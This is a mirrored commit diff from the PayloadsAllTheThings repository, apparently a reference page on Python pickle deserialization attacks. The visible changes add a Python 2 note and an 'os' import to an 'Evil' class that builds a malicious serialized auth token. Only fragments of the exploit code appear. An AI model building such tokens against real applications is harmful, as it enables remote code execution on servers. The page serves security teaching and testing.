mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-15 21:34:25 +01:00
commit
4ea77223bb
1 changed files with 3 additions and 2 deletions
|
|
@ -3,6 +3,7 @@
|
|||
## Pickle
|
||||
|
||||
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
|
||||
:warning: `import cPickle` will only work on Python 2
|
||||
|
||||
```python
|
||||
import cPickle
|
||||
|
|
@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
|
|||
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
|
||||
|
||||
```python
|
||||
import cPickle
|
||||
import cPickle, os
|
||||
from base64 import b64encode, b64decode
|
||||
|
||||
class Evil(object):
|
||||
|
|
@ -47,4 +48,4 @@ print("Your Evil Token : {}").format(evil_token)
|
|||
## References
|
||||
|
||||
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
|
||||
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
||||
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
||||
|
|
|
|||
Loading…
Reference in a new issue